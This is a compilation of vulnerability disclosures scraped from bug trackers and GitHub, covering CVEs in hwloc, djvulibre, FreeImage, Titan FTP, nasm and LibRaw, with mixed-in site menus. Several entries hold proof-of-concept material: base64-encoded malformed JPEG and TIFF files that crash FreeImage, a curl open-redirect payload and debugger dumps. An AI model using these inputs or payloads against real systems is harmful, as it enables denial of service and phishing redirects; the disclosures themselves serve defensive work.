An issue was discovered in open-mpi hwloc 2.1.0 allows attackers to cause a denial of service or other unspecified impacts via glibc-cpuset in topology-linux.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

ash1852 opened this issue

Aug 31, 2022

· 3 comments

**Comments**

Hi, I found a potential null pointer dereference bug in the project source code of hwloc, and I have shown the execution sequence of the program that may generate the bug on the graph below. The red text illustrates the steps that generate the bug, the green text represents some additional information to help understanding when the steps occur and the file path can be seen in the blue framed section.

Although the code shown is for version 2.1.0, this potential bug is still present in the current version

setsize \= CPU\_ALLOC\_SIZE(last+1);

plinux\_set \= CPU\_ALLOC(last+1);

CPU\_ZERO\_S(setsize, plinux\_set);

  
would you can help to check if this bug is true?thank you!

Hello  
Yes, there are likely many corner cases like where we don't check allocation return values. Similar issue in hwloc\_linux\_set\_tid\_cpubind(), hwloc\_linux\_find\_kernel\_nr\_cpus() and hwloc\_linux\_get\_tid\_cpubind(), hwloc\_linux\_set\_thread\_cpubind(), hwloc\_linux\_get\_thread\_cpubind().  
The (bad) rational is that other things will go wrong before this one will trigger a crash. Feel free to send a fix :)

 bgoglin changed the title A potential bug of NPD potential NULL glibc-cpuset dereferences in topology-linux.c

Aug 31, 2022

CVE-2022-47022 was assigned to this issue.

I didn't have any involvement in the assignment, posting here for visibility.

Thanks for the reminder, I forgot about this, I am pushing the fix to master and all stable branches.

bgoglin added a commit that referenced this issue

Aug 24, 2023

CVE-2022-47022: potential NULL glibc-cpuset dereferences in topology-linux.c · Issue #544 · open-mpi/hwloc

An issue was discovered IW44EncodeCodec.cpp in djvulibre 3.5.28 in allows attackers to cause a denial of service via divide by zero.

Command：c44 POC  
Result：  
gdb information：floating point exception  
Program received signal SIGFPE, Arithmetic exception.  
0x00005555555afe13 in DJVU::IWBitmap::Encode::init (this=0x5555555fb1f0, bm=..., gmask=...) at IW44EncodeCodec.cpp:1431  
1431 bconv\[i\] = max(0,min(255,i\*255/g)) - 128;  
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA  
──────────────────────────────────────────────────────────────────────────────────────────────────\[ REGISTERS \]──────────────────────────────────────────────────────────────────────────────────────────────────  
RAX 0x0  
RBX 0x0  
RCX 0x0  
RDX 0x0  
RDI 0x0  
RSI 0x7fffffffdfc0 ◂— 0x0  
R8 0xff  
R9 0x0  
R10 0x1  
R11 0x246  
R12 0x0  
R13 0x7fffffffe110 ◂— 0x0  
R14 0x0  
R15 0x18  
RBP 0x5555555fb2f0 —▸ 0x5555555e1ab8 —▸ 0x55555557aa50 (DJVU::GBitmap::~GBitmap()) ◂— endbr64  
RSP 0x7fffffffdf70 —▸ 0x7fffffffe170 —▸ 0x5555555faf50 —▸ 0x5555555e1880 —▸ 0x55555556f0e0 (DJVU::MemoryMapByteStream::~MemoryMapByteStream()) ◂— ...  
RIP 0x5555555afe13 ◂— idiv r14d  
───────────────────────────────────────────────────────────────────────────────────────────────────\[ DISASM \]────────────────────────────────────────────────────────────────────────────────────────────────────  
► 0x5555555afe13 idiv r14d  
↓  
0x5555555afe13 idiv r14d

────────────────────────────────────────────────────────────────────────────────────────────────\[ SOURCE (CODE) \]────────────────────────────────────────────────────────────────────────────────────────────────  
In file: /home/zxq/CVE\_testing/source/djvulibre-3.5.28/libdjvu/IW44EncodeCodec.cpp  
1426 signed char _buffer;  
1427 GPBuffer<signed char=""> gbuffer(buffer,w</signed>_h);  
1428 // Prepare gray level conversion table  
1429 signed char bconv\[256\];  
1430 for (i=0; i<256; i++)  
► 1431 bconv\[i\] = max(0,min(255,i_255/g)) - 128;  
1432 // Perform decomposition  
1433 // Prepare mask information  
1434 const signed char_ msk8 = 0;  
1435 int mskrowsize = 0;  
1436 GBitmap \*mask=gmask;  
────────────────────────────────────────────────────────────────────────────────────────────────────\[ STACK \]────────────────────────────────────────────────────────────────────────────────────────────────────  
00:0000│ rsp 0x7fffffffdf70 —▸ 0x7fffffffe170 —▸ 0x5555555faf50 —▸ 0x5555555e1880 —▸ 0x55555556f0e0 (DJVU::MemoryMapByteStream::~MemoryMapByteStream()) ◂— ...  
01:0008│ 0x7fffffffdf78 ◂— 0x2f8559fd8e9bfc00  
02:0010│ 0x7fffffffdf80 —▸ 0x5555555fb1f0 —▸ 0x5555555e25b8 —▸ 0x5555555afb40 (DJVU::IWBitmap::Encode::~Encode()) ◂— endbr64  
03:0018│ 0x7fffffffdf88 ◂— 0x0  
04:0020│ 0x7fffffffdf90 —▸ 0x7fffffffdfb0 —▸ 0x7fffffffdfa8 ◂— 0x0  
05:0028│ 0x7fffffffdf98 —▸ 0x7fffffffe050 —▸ 0x5555555e1b00 (DJVU::GCont::TrivTraits<1>::traits()::theTraits) ◂— 0x1  
06:0030│ 0x7fffffffdfa0 —▸ 0x55555557f820 ◂— endbr64  
07:0038│ 0x7fffffffdfa8 ◂— 0x0  
──────────────────────────────────────────────────────────────────────────────────────────────────\[ BACKTRACE \]──────────────────────────────────────────────────────────────────────────────────────────────────  
► f 0 0x5555555afe13  
f 1 0x5555555b00a4  
f 2 0x55555556ba02 main+1986  
f 3 0x7ffff79f00b3 \_\_libc\_start\_main+243  
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────  
pwndbg> pg  
Undefined command: "pg". Try "help".  
pwndbg> p g  
$1 = 0

CVE-2021-46312: DjVuLibre / Bugs / #344 Divide By Zero in djvulibre-3.5.28/libdjvu/IW44EncodeCodec.cpp

An issue discovered in Samsung SyncThru Web Service SPL 5.93 06-09-2014 allows attackers to gain escalated privileges via MITM attacks.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2021-35309: cve-subscriptions/samsung-stws at main · mustafa-turgut/cve-subscriptions

There is an open redirect vulnerability in Titan FTP server 19.0 and below. Users are redirected to any target URL.

**Introduction**

A new vulnerability has been discovered affecting Titan FTP web server catalogued as CVE-2022-44215. Titan FTP is a commertial software created by South River Technologies that implements FTP protocol for file sharing. In its HTTP(S) version 19.X and prior, it has been proved to be vulnerable to an Open Redirection vulnerability.

**Description**

An Open redirection vulnerability consist into the server not correctly sanitizing the user’s input. Therefore, a redirection is done using the user-supplied input without sanitization (white/blacklisting). In this case, Titan FTP server performs a redirection when a backslash \ is encountered in the URL. No matter if the backslash is in plaintext or URL encoded (%5C). https://<server>\<malicious_url> will produce the server supplying a redirection to \<malicious_url>.

**Testing**

To exploit this, the browser needs to understand the protocol of the location HTTP response header. This is to contain HTTP or HTTPS. To circumvent this, it is possible to supply instead of one backslash, two of them “\\”. This will be interpreted as a protocol separator and most browsers will use HTTP protocol by default. In the end, the working payload to achieve a redirection will be something similar to this: http[s]://<server>\\<malicious_url>

To perform this test, also CURL can be used. However, bear in mind that CURL will detect it as bad crafted since “\\” is prohibited by the standard RFC 2396. To bypass this using curl we can use the following command:

Curl -i http[s]://<server> --request-target \\\\malicious.com

**Proof of concept**

Despite the issue, the exploitation is limited due to browsers normally rewrite starting backslashes “\\” into “/”, producing that attacks using directly the plaintext will not work in most of the cases. Some workarounds could be done using HTML payloads that bypass browsers URL rewrite rules.

**Conclusion**

According to Shodan, in December 2022 this server is publicly exposed at 1.278 servers worldwide:

This vulnerability could be used by attackers to perform social engineering attacks redirecting victims to fake FTP login pages or other phishing scenarios.

CVE-2022-44215: GitHub - JBalanza/CVE-2022-44215: Public disclosure of TitanFTP 19.X Open Redirection vulnerability

A heap overflow bug exists FreeImage before 1.18.0 via ofLoad function in PluginJPEG.cpp.

*   Summary
*   Files
*   Reviews
*   Support
*   Mailing Lists
*   Code
*   Tickets ▾
    *   Feature Requests
    *   Patches
    *   Bugs
    *   Support Requests
*   News
*   Discussion
*   FreeImage

Menu ▾ ▴

Status: open

Owner: nobody

Labels: None

Priority: 5

Updated: 2021-08-26

Created: 2021-08-26

Private: No

> tl;dr:  
> When Load SOF(Start Of Frame) JPEG files, "components" of SOF is read from file. FreeImage alloc memory size is controlled by "components" , but sometime FreeImage replace default size to alloc. if "components" is greater than default in alloc function, it will writing data more than the allocated memory.

When the program reads a JPEG file, it will be handed to the Load function of the 'PluginJPEG.cpp' file,  
in Load function, we alloc memory by FreeImage\_AllocateHeader(), and write memory in jpeg\_read\_scanlines(). And the "components" is read from file.

static FIBITMAP \* DLL\_CALLCONV
Load(FreeImageIO \*io, fi\_handle handle, int page, int flags, void \*data) {
    if (handle) {
......
        struct jpeg\_decompress\_struct cinfo;
......
            // step 3: read handle parameters with jpeg\_read\_header()

            jpeg\_read\_header(&cinfo, TRUE);                //<---- read components from file
......
            if((cinfo.output\_components \== 4) && (cinfo.out\_color\_space \== JCS\_CMYK)) {
......
            } else {
                // RGB or greyscale image              v------------ alloc memory function
                dib \= FreeImage\_AllocateHeader(header\_only, cinfo.output\_width, cinfo.output\_height, 8 \* cinfo.output\_components, FI\_RGBA\_RED\_MASK, FI\_RGBA\_GREEN\_MASK, FI\_RGBA\_BLUE\_MASK);
......
            }
......
            if((cinfo.out\_color\_space \== JCS\_CMYK) && ((flags & JPEG\_CMYK) != JPEG\_CMYK)) {
......
            } else if((cinfo.out\_color\_space \== JCS\_CMYK) && ((flags & JPEG\_CMYK) \== JPEG\_CMYK)) {
......
            } else {
                // normal case (RGB or greyscale image)

                while (cinfo.output\_scanline < cinfo.output\_height) {
                    JSAMPROW dst \= FreeImage\_GetScanLine(dib, cinfo.output\_height \- cinfo.output\_scanline \- 1);

                    jpeg\_read\_scanlines(&cinfo, &dst, 1);       // <---------- write memory
                }

                // step 7b: swap red and blue components (see LibJPEG/jmorecfg.h: #define RGB\_RED, ...)
                // The default behavior of the JPEG library is kept "as is" because LibTIFF uses 
                // LibJPEG "as is".
......
    }

    return NULL;
}

FreeImage\_AllocateHeader() alloc memory by "output\_components", but FreeImage\_AllocateHeader function maybe replace default size with it.

FIBITMAP \* DLL\_CALLCONV
FreeImage\_AllocateHeader(BOOL header\_only, int width, int height, int bpp, unsigned red\_mask, unsigned green\_mask, unsigned blue\_mask) {
    return FreeImage\_AllocateBitmap(header\_only, NULL, 0, FIT\_BITMAP, width, height, bpp, red\_mask, green\_mask, blue\_mask);
}

static FIBITMAP \* 
FreeImage\_AllocateBitmap(BOOL header\_only, BYTE \*ext\_bits, unsigned ext\_pitch, FREE\_IMAGE\_TYPE type, int width, int height, int bpp, unsigned red\_mask, unsigned green\_mask, unsigned blue\_mask) {
.......
    // check pixel bit depth
    switch(type) {
        case FIT\_BITMAP:
            switch(bpp) {
                case 1:
                case 4:
                case 8:
                    break;
                case 16:
                    need\_masks \= TRUE;
                    break;
                case 24:
                case 32:
                    break;
                default:
                    bpp \= 8;                                                                    //<---- change bpp there
                    break;
            }
            break;
.......
        size\_t dib\_size \= FreeImage\_GetInternalImageSize(header\_only || ext\_bits, width, height, bpp, need\_masks);          //<\---- calc alloc size by bpp(num\_components)

        if(dib\_size \== 0) {
            // memory allocation will fail (probably a malloc overflow)
            free(bitmap);
            return NULL;
        }

        bitmap-\>data \= (BYTE \*)FreeImage\_Aligned\_Malloc(dib\_size \* sizeof(BYTE), FIBITMAP\_ALIGNMENT);                       //<\---- real alloc function
.......
}

in FreeImage\_GetInternalImageSize(), it calc alloc size

static size\_t 
FreeImage\_GetInternalImageSize(BOOL header\_only, unsigned width, unsigned height, unsigned bpp, BOOL need\_masks) {
    size\_t dib\_size \= sizeof(FREEIMAGEHEADER);
......
    if(!header\_only) {
        const size\_t header\_size \= dib\_size;

        // pixels are aligned on a 16 bytes boundary
        dib\_size += (size\_t)CalculatePitch(CalculateLine(width, bpp)) \* (size\_t)height;    //<---alloc size by line lenght \* height, line lenght calc by width and bpp(num\_components)
......
    }

    return dib\_size;
}

but when we use jpeg\_read\_scanlines, the read size calc by "num\_components", usually equal "output\_components".

METHODDEF(void)
null\_convert (j\_decompress\_ptr cinfo,
          JSAMPIMAGE input\_buf, JDIMENSION input\_row,
          JSAMPARRAY output\_buf, int num\_rows)
{
  register JSAMPROW outptr;
  register JSAMPROW inptr;
  register JDIMENSION count;
  register int num\_comps \= cinfo\->num\_components;
  JDIMENSION num\_cols \= cinfo\->output\_width;
  int ci;

  while (\--num\_rows \>= 0) {
    /\* It seems fastest to make a separate pass for each component. \*/
    for (ci \= 0; ci < num\_comps; ci++) {
      inptr \= input\_buf\[ci\]\[input\_row\];
      outptr \= output\_buf\[0\] + ci;
      for (count \= num\_cols; count \> 0; count\--) {
    \*outptr \= \*inptr++; /\* don't need GETJSAMPLE() here \*/        //<---- copy size calc by width(output\_width) and bpp(num\_components)
    outptr += num\_comps;
      }
    }
    input\_row++;
    output\_buf++;
  }
}

callstack

FreeImage.dll!null\_convert(jpeg\_decompress\_struct \* cinfo, unsigned char \* \* \* input\_buf, unsigned int input\_row, unsigned char \* \* output\_buf, int num\_rows)
FreeImage.dll!sep\_upsample(jpeg\_decompress\_struct \* cinfo, unsigned char \* \* \* input\_buf, unsigned int \* in\_row\_group\_ctr, unsigned int in\_row\_groups\_avail, unsigned char \* \* output\_buf, unsigned int \* out\_row\_ctr, unsigned int out\_rows\_avail)
FreeImage.dll!process\_data\_simple\_main(jpeg\_decompress\_struct \* cinfo, unsigned char \* \* output\_buf, unsigned int \* out\_row\_ctr, unsigned int out\_rows\_avail)
FreeImage.dll!jpeg\_read\_scanlines(jpeg\_decompress\_struct \* cinfo, unsigned char \* \* scanlines, unsigned int max\_lines)
FreeImage.dll!Load(FreeImageIO \* io, void \* handle, int page, int flags, void \* data)
FreeImage.dll!FreeImage\_LoadFromHandle(FREE\_IMAGE\_FORMAT fif, FreeImageIO \* io, void \* handle, int flags)
FreeImage.dll!FreeImage\_Load(FREE\_IMAGE\_FORMAT fif, const char \* filename, int flags)

Finally, it will cause the heap overflow if we make the "components" not in \[1, 2, 3\]. Moreover, it may has the risk of arbitrary code execution.

windbg:

ModLoad: 10000000 105ee000   D:\\temp\\\_zzz\\FreeImage.dll
ModLoad: 752b0000 752c4000   C:\\Windows\\SysWOW64\\VCRUNTIME140.dll
ModLoad: 755e0000 75643000   C:\\Windows\\SysWOW64\\WS2\_32.dll
ModLoad: 77050000 7710f000   C:\\Windows\\SysWOW64\\RPCRT4.dll
(5cb0.349c): Break instruction exception \- code 80000003 (first chance)
eax\=00000000 ebx\=00000000 ecx\=608e0000 edx\=00000000 esi\=77442044 edi\=7744260c
eip\=774e1b72 esp\=0133f5c8 ebp\=0133f5f4 iopl\=0         nv up ei pl zr na pe nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00000246
ntdll!LdrpDoDebuggerBreak+0x2b:
774e1b72 cc              int     3
0:000\> g
(5cb0.349c): Access violation \- code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
\*\*\* WARNING: Unable to verify checksum for D:\\temp\\\_zzz\\FreeImage.dll
eax\=08539007 ebx\=00000009 ecx\=00000880 edx\=073590c8 esi\=00000721 edi\=00000000
eip\=1009aec5 esp\=0133f6cc ebp\=00000000 iopl\=0         nv up ei pl nz na pe nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00010206
FreeImage!jinit\_color\_deconverter+0x935:
1009aec5 8808            mov     byte ptr \[eax\],cl          ds:002b:08539007\=??
0:000\> db eax\-0x20
08538fe7  00 00 00 00 00 80 00 00-00 c0 c0 c0 c0 c0 80 c0  ................
08538ff7  c0 c0 c0 c0 d0 d0 d0 80\-d0 ?? ?? ?? ?? ?? ?? ??  .........???????
08539007  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
08539017  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
08539027  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
08539037  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
08539047  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
08539057  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:000\> kv
 \# ChildEBP RetAddr      Args to Child              
00 0133f6d8 1009a383     00000808 073536cc 00000000 FreeImage!jinit\_color\_deconverter+0x935 (FPO: \[Uses EBP\] \[5,0,1\])
01 0133f704 100991d3     073536c0 07354fe0 07355008 FreeImage!jinit\_upsampler+0x263 (FPO: \[Uses EBP\] \[7,1,4\])
02 0133f734 10085bfa     0133f830 0133fa18 0133f754 FreeImage!jinit\_d\_main\_controller+0x1f3 (FPO: \[Uses EBP\] \[4,0,4\])
03 0133f74c 1002283f     00000000 0133fa18 00000001 FreeImage!jpeg\_read\_scanlines+0x8a (FPO: \[3,0,1\])
04 0133fa48 1000d9de     0133fa9c 07339fc8 ffffffff FreeImage!jpeg\_freeimage\_dst+0x1b1f (FPO: \[5,183,3\])
05 0133fa7c 1000da60     00000002 0133fa9c 07339fc8 FreeImage!FreeImage\_LoadFromHandle+0x8e (FPO: \[Uses EBP\] \[4,3,2\])
06 0133faa8 00b0107b     00000002 07335fee 00000000 FreeImage!FreeImage\_Load+0x50 (FPO: \[3,4,2\])

TestFile:

data:image/jpeg;base64,/9j/2wADAP/KACMICAgICAkBETLvESEDESH/QSF5IgAxETExFDExIjExETEx/9oACAF5AAAAAA\==

**2 Attachments**

**Discussion**

Log in to post a comment.

CVE-2021-40265: FreeImage / Bugs / #337 A heap_overflow on PluginJPEG.cpp when Load() SOF(Start Of Frame) JPEG

NULL pointer dereference vulnerability in FreeImage before 1.18.0 via the FreeImage_CloneTag function inFreeImageTag.cpp.

> tl;dr:  
> When Load TIFF format files, field "StripOffsets" is read from file. If the file compression is OJPEG and "StripOffsets" not exist in TIFF files, FreeImage will try to read nullptr by memcpy().

When the program Open a TIFF format file, it will be handed to the "TIFFFdOpen()" function of the 'PluginTIFF.cpp' file,  
in "TIFFFdOpen()" functions, it call "TIFFReadDirectory()" function, and it use "hack" code. So field "StripOffsets" will set nullptr sometimes.

int
TIFFReadDirectory(TIFF\* tif){
......
        if ((tif->tif\_dir.td\_compression==COMPRESSION\_OJPEG) &&
            (isTiled(tif)==0) &&
            (tif->tif\_dir.td\_nstrips==1)) {
            /\*
             \* XXX: OJPEG hack.
             \* If a) compression is OJPEG, b) it's not a tiled TIFF,
             \* and c) the number of strips is 1,
             \* then we tolerate the absence of stripoffsets tag,
             \* because, presumably, all required data is in the
             \* JpegInterchangeFormat stream.
             \*/
            TIFFSetFieldBit(tif, FIELD\_STRIPOFFSETS);
......
}

When we Load a TIFF format file, it will be handed to the "Load()" function of the 'PluginTIFF.cpp' file, it will call FreeImage\_CloneTag() with tag 'StripOffsets' finally.

FITAG \* DLL\_CALLCONV 
FreeImage\_CloneTag(FITAG \*tag) {
    if(!tag) return NULL;

    // allocate a new tag
    FITAG \*clone \= FreeImage\_CreateTag();
    if(!clone) return NULL;

    try {
        // copy the tag
        FITAGHEADER \*src\_tag \= (FITAGHEADER \*)tag\->data;
        FITAGHEADER \*dst\_tag \= (FITAGHEADER \*)clone\->data;

        // tag ID
        dst\_tag\->id \= src\_tag\->id;
        // tag key
        if(src\_tag\->key) {
            dst\_tag\->key \= (char\*)malloc((strlen(src\_tag\->key) + 1) \* sizeof(char));
            if(!dst\_tag\->key) {
                throw FI\_MSG\_ERROR\_MEMORY;
            }
            strcpy(dst\_tag\->key, src\_tag\->key);
        }
        // tag description
        if(src\_tag\->description) {
            dst\_tag\->description \= (char\*)malloc((strlen(src\_tag\->description) + 1) \* sizeof(char));
            if(!dst\_tag\->description) {
                throw FI\_MSG\_ERROR\_MEMORY;
            }
            strcpy(dst\_tag\->description, src\_tag\->description);
        }
        // tag data type
        dst\_tag\->type \= src\_tag\->type;
        // tag count
        dst\_tag\->count \= src\_tag\->count;
        // tag length
        dst\_tag\->length \= src\_tag\->length;
        // tag value
        switch(dst\_tag\->type) {
            case FIDT\_ASCII:
                dst\_tag\->value \= (BYTE\*)malloc((src\_tag\->length + 1) \* sizeof(BYTE));
                if(!dst\_tag\->value) {
                    throw FI\_MSG\_ERROR\_MEMORY;
                }
                memcpy(dst\_tag\->value, src\_tag\->value, src\_tag\->length);
                ((BYTE\*)dst\_tag\->value)\[src\_tag\->length\] \= 0;
                break;
            default:
                dst\_tag\->value \= (BYTE\*)malloc(src\_tag\->length \* sizeof(BYTE));
                if(!dst\_tag\->value) {
                    throw FI\_MSG\_ERROR\_MEMORY;
                }
                memcpy(dst\_tag\->value, src\_tag\->value, src\_tag\->length);                    //<---- src\_tag\->value \= nullptr
                break;
        }

        return clone;

    } catch(const char \*message) {
        FreeImage\_DeleteTag(clone);
        FreeImage\_OutputMessageProc(FIF\_UNKNOWN, message);
        return NULL;
    }
}

So if the file compression is OJPEG and "StripOffsets" not exist in TIFF files, FreeImage will try to read nullptr by memcpy(). It allows an attacker to cause Denial of Service.

windbg:

ModLoad: 10000000 105ee000   D:\\temp\\\_zzz\\FreeImage.dll
ModLoad: 752b0000 752c4000   C:\\Windows\\SysWOW64\\VCRUNTIME140.dll
ModLoad: 755e0000 75643000   C:\\Windows\\SysWOW64\\WS2\_32.dll
ModLoad: 77050000 7710f000   C:\\Windows\\SysWOW64\\RPCRT4.dll
(8558.62d4): Break instruction exception \- code 80000003 (first chance)
eax\=00000000 ebx\=00000000 ecx\=cbc20000 edx\=00000000 esi\=77442044 edi\=7744260c
eip\=774e1b72 esp\=00aff42c ebp\=00aff458 iopl\=0         nv up ei pl zr na pe nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00000246
ntdll!LdrpDoDebuggerBreak+0x2b:
774e1b72 cc              int     3
0:000\> g
(8558.62d4): Access violation \- code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
\*\*\* WARNING: Unable to verify checksum for D:\\temp\\\_zzz\\FreeImage.dll
eax\=00000008 ebx\=06a8bff8 ecx\=00000002 edx\=00000008 esi\=00000000 edi\=0fd44ff8
eip\=102a6e77 esp\=00aff500 ebp\=00aff54c iopl\=0         nv up ei pl nz ac po nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00010212
FreeImage!memcpy+0x507:
102a6e77 8b16            mov     edx,dword ptr \[esi\]  ds:002b:00000000\=????????
0:000\> kv
 \# ChildEBP RetAddr      Args to Child              
00 00aff504 1006577c     0fd44ff8 00000000 00000008 FreeImage!memcpy+0x507 (FPO: \[3,0,2\]) (CONV: cdecl) \[d:\\agent\\\_work\\4\\s\\src\\vctools\\crt\\vcruntime\\src\\string\\i386\\memcpy.asm @ 657\] 
01 00aff54c 10003dd0     0fd3efe8 00000001 0fd32ff8 FreeImage!FreeImage\_CloneTag+0x13c
02 00aff590 1006ba21     00000001 06a87ff8 0fd36ff0 FreeImage!FreeImage\_SetMetadata+0x3c0
03 00aff5d8 1006bb17     06a87ff8 1006bccd 06a87ff8 FreeImage!tiff\_read\_geotiff\_profile+0xa91 (FPO: \[Uses EBP\] \[2,11,4\])
04 00aff634 100356a2     06a87ff8 06a63c88 00aff900 FreeImage!tiff\_read\_exif\_tags+0x47
05 00aff664 10036c8b     06a63c88 06a87ff8 06a52fc8 FreeImage!\_TIFFmemcmp+0xae2
06 00aff8ac 1000d9de     00aff900 06a52fc8 105f0700 FreeImage!\_TIFFmemcmp+0x20cb (FPO: \[5,139,3\])
07 00aff8e0 1000da60     00000012 00aff900 06a52fc8 FreeImage!FreeImage\_LoadFromHandle+0x8e (FPO: \[Uses EBP\] \[4,3,2\])
08 00aff90c 00b0107b     00000012 06a4efee 00000000 FreeImage!FreeImage\_Load+0x50 (FPO: \[3,4,2\])

TestFile:

data:image/tiff;base64,SUkqAAgAAAAFAAABAwABAAAAMDAAAAEBAwABAAAAMDAAAAMBAwABAAAABgAAAAYBAwABAAAAAAAAAB4ABAAMAAAABAAAAAAAAAAAAAAAAAA\=

CVE-2021-40264: FreeImage / Bugs / #335 A NULL pointer dereference exists in function FreeImage_CloneTag() located in PluginTIFF.cpp

Buffer Overflow vulnerability in hash_findi function in hashtbl.c in nasm 2.15rc0 allows remote attackers to cause a denial of service via crafted asm file.

Self-registration is disabled due to spam issue (mail gorcunov@gmail.com or hpa@zytor.com to create an account)

'3392644?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-21685: Invalid Bug ID

Buffer Overflow vulnerability in LibRaw::stretch() function in libraw\src\postprocessing\aspect_ratio.cpp.

**Description**

An out-of-bounds read vulnerability exists within the "LibRaw::stretch()" function (libraw\\src\\postprocessing\\aspect\_ratio.cpp) when parsing a crafted CRW file.

**Steps to Reproduce**

(poc archive password= girlelecta):  
https://drive.google.com/open?id=1Y70DxvWYfsNS7DBu4cuoUVOoMOyheA8O

cmd:  
magick.exe convert poc.crw new.png

Upon running this, following crash happens (Note: I enabled page heap on magick.exe):

Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64  
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\\Program Files\\ImageMagick-7.0.9-Q16\\magick.exe" convert E:\\Workspace\\poc.crw E:\\Workspace\\new.png

\*\*\*\*\*\*\*\*\*\*\*\*\* Path validation summary \*\*\*\*\*\*\*\*\*\*\*\*\*\*  
Symbol search path is: srv\*  
Executable search path is:  
ModLoad: 00007ff7 93fc0000 00007ff7 93fcc000 image00007ff7 93fc0000  
ModLoad: 00007ff8 87ea0000 00007ff8 88090000 ntdll.dll  
ModLoad: 00007ff8 70fb0000 00007ff8 71021000 C:\\WINDOWS\\System32\\verifier.dll  
Page heap: pid 0x2ADC: page heap enabled with flags 0x3.  
ModLoad: 00007ff8 87bb0000 00007ff8 87c62000 C:\\WINDOWS\\System32\\KERNEL32.DLL  
ModLoad: 00007ff8 85820000 00007ff8 85ac3000 C:\\WINDOWS\\System32\\KERNELBASE.dll  
ModLoad: 00007ff8 6e630000 00007ff8 6e808000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_MagickCore\_.dll  
ModLoad: 00007ff8 6e550000 00007ff8 6e629000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_MagickWand\_.dll  
ModLoad: 00007ff8 6e460000 00007ff8 6e54f000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\MSVCR120.dll  
ModLoad: 000002c7 22170000 000002c7 2225f000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\MSVCR120.dll  
ModLoad: 00007ff8 74a90000 00007ff8 74ab2000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\VCOMP120.DLL  
ModLoad: 00007ff8 876f0000 00007ff8 87884000 C:\\WINDOWS\\System32\\USER32.dll  
ModLoad: 00007ff8 85e80000 00007ff8 85ea1000 C:\\WINDOWS\\System32\\win32u.dll  
ModLoad: 00007ff8 862f0000 00007ff8 86316000 C:\\WINDOWS\\System32\\GDI32.dll  
ModLoad: 00007ff8 855b0000 00007ff8 85744000 C:\\WINDOWS\\System32\\gdi32full.dll  
ModLoad: 00007ff8 85eb0000 00007ff8 85f4e000 C:\\WINDOWS\\System32\\msvcp\_win.dll  
ModLoad: 00007ff8 87c70000 00007ff8 87d13000 C:\\WINDOWS\\System32\\ADVAPI32.dll  
ModLoad: 00007ff8 86680000 00007ff8 8671e000 C:\\WINDOWS\\System32\\msvcrt.dll  
ModLoad: 00007ff8 861f0000 00007ff8 86287000 C:\\WINDOWS\\System32\\sechost.dll  
ModLoad: 00007ff8 85ad0000 00007ff8 85bca000 C:\\WINDOWS\\System32\\ucrtbase.dll  
ModLoad: 00007ff8 87d40000 00007ff8 87e60000 C:\\WINDOWS\\System32\\RPCRT4.dll  
ModLoad: 00007ff8 74f30000 00007ff8 74f44000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_bzlib\_.dll  
ModLoad: 00007ff8 86600000 00007ff8 8666f000 C:\\WINDOWS\\System32\\WS2\_32.dll  
ModLoad: 00007ff8 6e400000 00007ff8 6e456000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_lcms\_.dll  
ModLoad: 00007ff8 6e360000 00007ff8 6e400000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_freetype\_.dll  
ModLoad: 00007ff8 73500000 00007ff8 73513000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_lqr\_.dll  
ModLoad: 00007ff8 73000000 00007ff8 73018000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_zlib\_.dll  
ModLoad: 00007ff8 6e100000 00007ff8 6e355000 C:\\Program Files\\ImageMagick-7.0.9-Q16\\CORE\_RL\_glib\_.dll  
ModLoad: 00007ff8 86720000 00007ff8 86e05000 C:\\WINDOWS\\System32\\SHELL32.dll  
ModLoad: 00007ff8 857d0000 00007ff8 8581a000 C:\\WINDOWS\\System32\\cfgmgr32.dll  
ModLoad: 00007ff8 85f50000 00007ff8 85ff9000 C:\\WINDOWS\\System32\\shcore.dll  
